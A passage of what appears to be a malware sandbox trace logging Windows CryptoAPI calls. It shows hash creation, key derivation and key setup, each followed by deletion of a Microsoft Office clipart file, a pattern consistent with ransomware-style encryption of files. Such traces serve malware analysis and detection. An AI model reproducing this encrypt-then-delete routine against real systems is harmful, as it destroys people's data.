Algid=0x6610, hBaseData=0x9ad778, dwFlags=0x4, phKey=0x1d444768 | out: phKey=0x1d444768*=0x9ad678) returned 1 [0179.743] CryptSetKeyParam (hKey=0x9ad678, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0179.743] CryptSetKeyParam (hKey=0x9ad678, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0179.743] wcslen (_String="\\\\?\\") returned 0x4 [0179.748] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00175_.GIF") returned 1 [0179.748] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00175_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00175_.gif")) returned 1 [0179.749] CryptDestroyKey (hKey=0x9ad7f8) returned 1 [0179.749] wcslen (_String="OK") returned 0x2 [0179.749] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0179.749] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0179.749] CryptDestroyKey (hKey=0x9ad678) returned 1 [0179.749] CryptDestroyHash (hHash=0x9ad778) returned 1 [0179.749] CryptReleaseContext (hProv=0x8e3b28, dwFlags=0x0) returned 1 [0180.263] CryptCreateHash (in: hProv=0x8e33b8, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444914 | out: phHash=0x1d444914) returned 1 [0180.263] CryptHashData (hHash=0x9ad1f8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0180.263] CryptDeriveKey (in: hProv=0x8e33b8, Algid=0x6610, hBaseData=0x9ad1f8, dwFlags=0x4, phKey=0x1d444918 | out: phKey=0x1d444918*=0x9ad138) returned 1 [0180.263] CryptSetKeyParam (hKey=0x9ad138, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0180.263] CryptSetKeyParam (hKey=0x9ad138, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0180.263] wcslen (_String="\\\\?\\") returned 0x4 [0180.474] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00176_.GIF") returned 1 [0180.474] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00176_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00176_.gif")) returned 1 [0180.475] CryptDestroyKey (hKey=0x9ad578) returned 1 [0180.475] wcslen (_String="OK") returned 0x2 [0180.475] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0180.475] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0180.475] CryptDestroyKey (hKey=0x9ad138) returned 1 [0180.475] CryptDestroyHash (hHash=0x9ad1f8) returned 1 [0180.475] CryptReleaseContext (hProv=0x8e33b8, dwFlags=0x0) returned 1 [0180.476] CryptCreateHash (in: hProv=0x8e3440, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4449d4 | out: phHash=0x1d4449d4) returned 1 [0180.476] CryptHashData (hHash=0x9ad1b8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0180.476] CryptDeriveKey (in: hProv=0x8e3440, Algid=0x6610, hBaseData=0x9ad1b8, dwFlags=0x4, phKey=0x1d4449d8 | out: phKey=0x1d4449d8*=0x9ad738) returned 1 [0180.477] CryptSetKeyParam (hKey=0x9ad738, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0180.477] CryptSetKeyParam (hKey=0x9ad738, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0180.477] wcslen (_String="\\\\?\\") returned 0x4 [0180.487] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00010_.WMF") returned 1 [0180.487] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00010_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an00010_.wmf")) returned 1 [0180.488] CryptDestroyKey (hKey=0x9ad138) returned 1 [0180.488] wcslen (_String="OK") returned 0x2 [0180.488] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0180.488] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0180.488] CryptDestroyKey (hKey=0x9ad738) returned 1 [0180.488] CryptDestroyHash (hHash=0x9ad1b8) returned 1 [0180.488] CryptReleaseContext (hProv=0x8e3440, dwFlags=0x0) returned 1 [0180.489] CryptCreateHash (in: hProv=0x8e2f78, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444764 | out: phHash=0x1d444764) returned 1 [0180.490] CryptHashData (hHash=0x9ad4b8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0180.490] CryptDeriveKey (in: hProv=0x8e2f78, Algid=0x6610, hBaseData=0x9ad4b8, dwFlags=0x4, phKey=0x1d444768 | out: phKey=0x1d444768*=0x9ad438) returned 1 [0180.490] CryptSetKeyParam (hKey=0x9ad438, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0180.490] CryptSetKeyParam (hKey=0x9ad438, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0180.490] wcslen (_String="\\\\?\\") returned 0x4 [0180.643] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00015_.WMF") returned 1 [0180.644] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00015_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an00015_.wmf")) returned 1 [0180.644] CryptDestroyKey (hKey=0x9ad378) returned 1 [0180.644] wcslen (_String="OK") returned 0x2 [0180.644] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0180.644] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0180.644] CryptDestroyKey (hKey=0x9ad438) returned 1 [0180.644] CryptDestroyHash (hHash=0x9ad4b8) returned 1 [0180.645] CryptReleaseContext (hProv=0x8e2f78, dwFlags=0x0) returned 1 [0180.646] CryptCreateHash (in: hProv=0x8e2ef0, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444a1c | out: phHash=0x1d444a1c) returned 1 [0180.646] CryptHashData (hHash=0x9ad438, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0180.646] CryptDeriveKey (in: hProv=0x8e2ef0, Algid=0x6610, hBaseData=0x9ad438, dwFlags=0x4, phKey=0x1d444a20 | out: phKey=0x1d444a20*=0x9ad738) returned 1 [0180.646] CryptSetKeyParam (hKey=0x9ad738, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0180.646] CryptSetKeyParam (hKey=0x9ad738, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0180.646] wcslen (_String="\\\\?\\") returned 0x4 [0181.064] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00790_.WMF") returned 1 [0181.064] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00790_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an00790_.wmf")) returned 1 [0181.065] CryptDestroyKey (hKey=0x9ad478) returned 1 [0181.065] wcslen (_String="OK") returned 0x2 [0181.065] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0181.065] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0181.065] CryptDestroyKey (hKey=0x9ad738) returned 1 [0181.065] CryptDestroyHash (hHash=0x9ad438) returned 1 [0181.065] CryptReleaseContext (hProv=0x8e2ef0, dwFlags=0x0) returned 1 [0181.067] CryptCreateHash (in: hProv=0x8e3330, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4449d4 | out: phHash=0x1d4449d4) returned 1 [0181.067] CryptHashData (hHash=0x9ad238, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0181.067] CryptDeriveKey (in: hProv=0x8e3330, Algid=0x6610, hBaseData=0x9ad238, dwFlags=0x4, phKey=0x1d4449d8 | out: phKey=0x1d4449d8*=0x9ad2b8) returned 1 [0181.067] CryptSetKeyParam (hKey=0x9ad2b8, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0181.067] CryptSetKeyParam (hKey=0x9ad2b8, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0181.067] wcslen (_String="\\\\?\\") returned 0x4 [0181.158] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00853_.WMF") returned 1 [0181.158] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00853_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an00853_.wmf")) returned 1 [0181.159] CryptDestroyKey (hKey=0x9ad138) returned 1 [0181.159] wcslen (_String="OK") returned 0x2 [0181.159] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0181.159] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0181.159] CryptDestroyKey (hKey=0x9ad2b8) returned 1 [0181.159] CryptDestroyHash (hHash=0x9ad238) returned 1 [0181.159] CryptReleaseContext (hProv=0x8e3330, dwFlags=0x0) returned 1 [0181.161] CryptCreateHash (in: hProv=0x8e2e68, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4447f4 | out: phHash=0x1d4447f4) returned 1 [0181.161] CryptHashData (hHash=0x9ad8b8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0181.161] CryptDeriveKey (in: hProv=0x8e2e68, Algid=0x6610, hBaseData=0x9ad8b8, dwFlags=0x4, phKey=0x1d4447f8 | out: phKey=0x1d4447f8*=0x9ad1f8) returned 1 [0181.161] CryptSetKeyParam (hKey=0x9ad1f8, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0181.161] CryptSetKeyParam (hKey=0x9ad1f8, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0181.161] wcslen (_String="\\\\?\\") returned 0x4 [0181.242] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00914_.WMF") returned 1 [0181.242] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00914_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an00914_.wmf")) returned 1 [0181.243] CryptDestroyKey (hKey=0x9ad538) returned 1 [0181.243] wcslen (_String="OK") returned 0x2 [0181.243] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0181.243] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0181.243] CryptDestroyKey (hKey=0x9ad1f8) returned 1 [0181.243] CryptDestroyHash (hHash=0x9ad8b8) returned 1 [0181.243] CryptReleaseContext (hProv=0x8e2e68, dwFlags=0x0) returned 1 [0181.245] CryptCreateHash (in: hProv=0x8e2e68, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444794 | out: phHash=0x1d444794) returned 1 [0181.245] CryptHashData (hHash=0x9ad838, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0181.245] CryptDeriveKey (in: hProv=0x8e2e68, Algid=0x6610, hBaseData=0x9ad838, dwFlags=0x4, phKey=0x1d444798 | out: phKey=0x1d444798*=0x9ad2b8) returned 1 [0181.245] CryptSetKeyParam (hKey=0x9ad2b8, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0181.245] CryptSetKeyParam (hKey=0x9ad2b8, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0181.245] wcslen (_String="\\\\?\\") returned 0x4 [0181.296] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00932_.WMF") returned 1 [0181.296] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00932_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an00932_.wmf")) returned 1 [0181.297] CryptDestroyKey (hKey=0x9ad278) returned 1 [0181.297] wcslen (_String="OK") returned 0x2 [0181.297] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0181.297] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0181.297] CryptDestroyKey (hKey=0x9ad2b8) returned 1 [0181.297] CryptDestroyHash (hHash=0x9ad838) returned 1 [0181.297] CryptReleaseContext (hProv=0x8e2e68, dwFlags=0x0) returned 1 [0181.299] CryptCreateHash (in: hProv=0x8e2ef0, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444974 | out: phHash=0x1d444974) returned 1 [0181.299] CryptHashData (hHash=0x9ad738, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0181.299] CryptDeriveKey (in: hProv=0x8e2ef0, Algid=0x6610, hBaseData=0x9ad738, dwFlags=0x4, phKey=0x1d444978 | out: phKey=0x1d444978*=0x9ad778) returned 1 [0181.299] CryptSetKeyParam (hKey=0x9ad778, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0181.299] CryptSetKeyParam (hKey=0x9ad778, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0181.299] wcslen (_String="\\\\?\\") returned 0x4 [0181.528] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00965_.WMF") returned 1 [0181.528] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00965_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an00965_.wmf")) returned 1 [0181.529] CryptDestroyKey (hKey=0x9ad138) returned 1 [0181.529] wcslen (_String="OK") returned 0x2 [0181.529] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0181.529] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0181.529] CryptDestroyKey (hKey=0x9ad778) returned 1 [0181.530] CryptDestroyHash (hHash=0x9ad738) returned 1 [0181.530] CryptReleaseContext (hProv=0x8e2ef0, dwFlags=0x0) returned 1 [0181.532] CryptCreateHash (in: hProv=0x8e2d58, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4447dc | out: phHash=0x1d4447dc) returned 1 [0181.532] CryptHashData (hHash=0x9ad2b8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0181.532] CryptDeriveKey (in: hProv=0x8e2d58, Algid=0x6610, hBaseData=0x9ad2b8, dwFlags=0x4, phKey=0x1d4447e0 | out: phKey=0x1d4447e0*=0x9ad2f8) returned 1 [0181.532] CryptSetKeyParam (hKey=0x9ad2f8, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0181.532] CryptSetKeyParam (hKey=0x9ad2f8, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0181.532] wcslen (_String="\\\\?\\") returned 0x4 [0181.552] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01039_.WMF") returned 1 [0181.552] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01039_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01039_.wmf")) returned 1 [0181.553] CryptDestroyKey (hKey=0x9ad878) returned 1 [0181.553] wcslen (_String="OK") returned 0x2 [0181.553] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0181.553] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0181.553] CryptDestroyKey (hKey=0x9ad2f8) returned 1 [0181.553] CryptDestroyHash (hHash=0x9ad2b8) returned 1 [0181.553] CryptReleaseContext (hProv=0x8e2d58, dwFlags=0x0) returned 1 [0181.555] CryptCreateHash (in: hProv=0x8e32a8, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4448e4 | out: phHash=0x1d4448e4) returned 1 [0181.555] CryptHashData (hHash=0x9ad8b8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0181.555] CryptDeriveKey (in: hProv=0x8e32a8, Algid=0x6610, hBaseData=0x9ad8b8, dwFlags=0x4, phKey=0x1d4448e8 | out: phKey=0x1d4448e8*=0x9ad638) returned 1 [0181.555] CryptSetKeyParam (hKey=0x9ad638, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0181.555] CryptSetKeyParam (hKey=0x9ad638, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0181.555] wcslen (_String="\\\\?\\") returned 0x4 [0181.656] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01044_.WMF") returned 1 [0181.657] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01044_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01044_.wmf")) returned 1 [0181.658] CryptDestroyKey (hKey=0x9ad578) returned 1 [0181.658] wcslen (_String="OK") returned 0x2 [0181.658] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0181.658] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0181.658] CryptDestroyKey (hKey=0x9ad638) returned 1 [0181.658] CryptDestroyHash (hHash=0x9ad8b8) returned 1 [0181.658] CryptReleaseContext (hProv=0x8e32a8, dwFlags=0x0) returned 1 [0181.678] CryptCreateHash (in: hProv=0x8e3088, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444764 | out: phHash=0x1d444764) returned 1 [0181.678] CryptHashData (hHash=0x9ad378, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0181.678] CryptDeriveKey (in: hProv=0x8e3088, Algid=0x6610, hBaseData=0x9ad378, dwFlags=0x4, phKey=0x1d444768 | out: phKey=0x1d444768*=0x9ad1f8) returned 1 [0181.678] CryptSetKeyParam (hKey=0x9ad1f8, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0181.678] CryptSetKeyParam (hKey=0x9ad1f8, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0181.678] wcslen (_String="\\\\?\\") returned 0x4 [0181.756] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01060_.WMF") returned 1 [0181.756] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01060_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01060_.wmf")) returned 1 [0181.757] CryptDestroyKey (hKey=0x9ad338) returned 1 [0181.757] wcslen (_String="OK") returned 0x2 [0181.757] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0181.757] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0181.757] CryptDestroyKey (hKey=0x9ad1f8) returned 1 [0181.757] CryptDestroyHash (hHash=0x9ad378) returned 1 [0181.757] CryptReleaseContext (hProv=0x8e3088, dwFlags=0x0) returned 1 [0181.759] CryptCreateHash (in: hProv=0x8e3a18, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4449a4 | out: phHash=0x1d4449a4) returned 1 [0181.759] CryptHashData (hHash=0x9ad478, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0181.759] CryptDeriveKey (in: hProv=0x8e3a18, Algid=0x6610, hBaseData=0x9ad478, dwFlags=0x4, phKey=0x1d4449a8 | out: phKey=0x1d4449a8*=0x9ad4b8) returned 1 [0181.759] CryptSetKeyParam (hKey=0x9ad4b8, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0181.759] CryptSetKeyParam (hKey=0x9ad4b8, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0181.759] wcslen (_String="\\\\?\\") returned 0x4 [0182.049] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01084_.WMF") returned 1 [0182.050] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01084_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01084_.wmf")) returned 1 [0182.051] CryptDestroyKey (hKey=0x9ad838) returned 1 [0182.051] wcslen (_String="OK") returned 0x2 [0182.051] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0182.051] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0182.051] CryptDestroyKey (hKey=0x9ad4b8) returned 1 [0182.051] CryptDestroyHash (hHash=0x9ad478) returned 1 [0182.051] CryptReleaseContext (hProv=0x8e3a18, dwFlags=0x0) returned 1 [0182.052] CryptCreateHash (in: hProv=0x8e35d8, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d44477c | out: phHash=0x1d44477c) returned 1 [0182.052] CryptHashData (hHash=0x9ad778, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0182.053] CryptDeriveKey (in: hProv=0x8e35d8, Algid=0x6610, hBaseData=0x9ad778, dwFlags=0x4, phKey=0x1d444780 | out: phKey=0x1d444780*=0x9ad478) returned 1 [0182.053] CryptSetKeyParam (hKey=0x9ad478, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0182.053] CryptSetKeyParam (hKey=0x9ad478, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0182.053] wcslen (_String="\\\\?\\") returned 0x4 [0182.063] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01173_.WMF") returned 1 [0182.063] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01173_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01173_.wmf")) returned 1 [0182.064] CryptDestroyKey (hKey=0x9ad5b8) returned 1 [0182.064] wcslen (_String="OK") returned 0x2 [0182.064] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0182.064] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0182.064] CryptDestroyKey (hKey=0x9ad478) returned 1 [0182.064] CryptDestroyHash (hHash=0x9ad778) returned 1 [0182.064] CryptReleaseContext (hProv=0x8e35d8, dwFlags=0x0) returned 1 [0182.066] CryptCreateHash (in: hProv=0x8e2de0, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d44477c | out: phHash=0x1d44477c) returned 1 [0182.066] CryptHashData (hHash=0x9ad5f8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0182.066] CryptDeriveKey (in: hProv=0x8e2de0, Algid=0x6610, hBaseData=0x9ad5f8, dwFlags=0x4, phKey=0x1d444780 | out: phKey=0x1d444780*=0x9ad738) returned 1 [0182.066] CryptSetKeyParam (hKey=0x9ad738, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0182.066] CryptSetKeyParam (hKey=0x9ad738, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0182.066] wcslen (_String="\\\\?\\") returned 0x4 [0182.135] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01174_.WMF") returned 1 [0182.135] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01174_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01174_.wmf")) returned 1 [0182.136] CryptDestroyKey (hKey=0x9ad638) returned 1 [0182.136] wcslen (_String="OK") returned 0x2 [0182.136] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0182.136] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0182.136] CryptDestroyKey (hKey=0x9ad738) returned 1 [0182.136] CryptDestroyHash (hHash=0x9ad5f8) returned 1 [0182.136] CryptReleaseContext (hProv=0x8e2de0, dwFlags=0x0) returned 1 [0182.138] CryptCreateHash (in: hProv=0x8e2cd0, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d44489c | out: phHash=0x1d44489c) returned 1 [0182.138] CryptHashData (hHash=0x9ad838, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0182.138] CryptDeriveKey (in: hProv=0x8e2cd0, Algid=0x6610, hBaseData=0x9ad838, dwFlags=0x4, phKey=0x1d4448a0 | out: phKey=0x1d4448a0*=0x9ad4b8) returned 1 [0182.138] CryptSetKeyParam (hKey=0x9ad4b8, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0182.138] CryptSetKeyParam (hKey=0x9ad4b8, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0182.138] wcslen (_String="\\\\?\\") returned 0x4 [0182.412] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01184_.WMF") returned 1 [0182.412] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01184_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01184_.wmf")) returned 1 [0182.413] CryptDestroyKey (hKey=0x9ad438) returned 1 [0182.413] wcslen (_String="OK") returned 0x2 [0182.413] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0182.413] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0182.413] CryptDestroyKey (hKey=0x9ad4b8) returned 1 [0182.413] CryptDestroyHash (hHash=0x9ad838) returned 1 [0182.413] CryptReleaseContext (hProv=0x8e2cd0, dwFlags=0x0) returned 1 [0182.415] CryptCreateHash (in: hProv=0x8e3330, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444854 | out: phHash=0x1d444854) returned 1 [0182.415] CryptHashData (hHash=0x9ad338, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0182.415] CryptDeriveKey (in: hProv=0x8e3330, Algid=0x6610, hBaseData=0x9ad338, dwFlags=0x4, phKey=0x1d444858 | out: phKey=0x1d444858*=0x9ad8b8) returned 1 [0182.416] CryptSetKeyParam (hKey=0x9ad8b8, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0182.416] CryptSetKeyParam (hKey=0x9ad8b8, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0182.416] wcslen (_String="\\\\?\\") returned 0x4 [0182.598] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01216_.WMF") returned 1 [0182.598] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01216_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01216_.wmf")) returned 1 [0182.599] CryptDestroyKey (hKey=0x9ad5b8) returned 1 [0182.599] wcslen (_String="OK") returned 0x2 [0182.599] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0182.599] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0182.599] CryptDestroyKey (hKey=0x9ad8b8) returned 1 [0182.599] CryptDestroyHash (hHash=0x9ad338) returned 1 [0182.599] CryptReleaseContext (hProv=0x8e3330, dwFlags=0x0) returned 1 [0182.601] CryptCreateHash (in: hProv=0x8e2e68, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4447ac | out: phHash=0x1d4447ac) returned 1 [0182.601] CryptHashData (hHash=0x9ad1f8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0182.601] CryptDeriveKey (in: hProv=0x8e2e68, Algid=0x6610, hBaseData=0x9ad1f8, dwFlags=0x4, phKey=0x1d4447b0 | out: phKey=0x1d4447b0*=0x9ad4b8) returned 1 [0182.601] 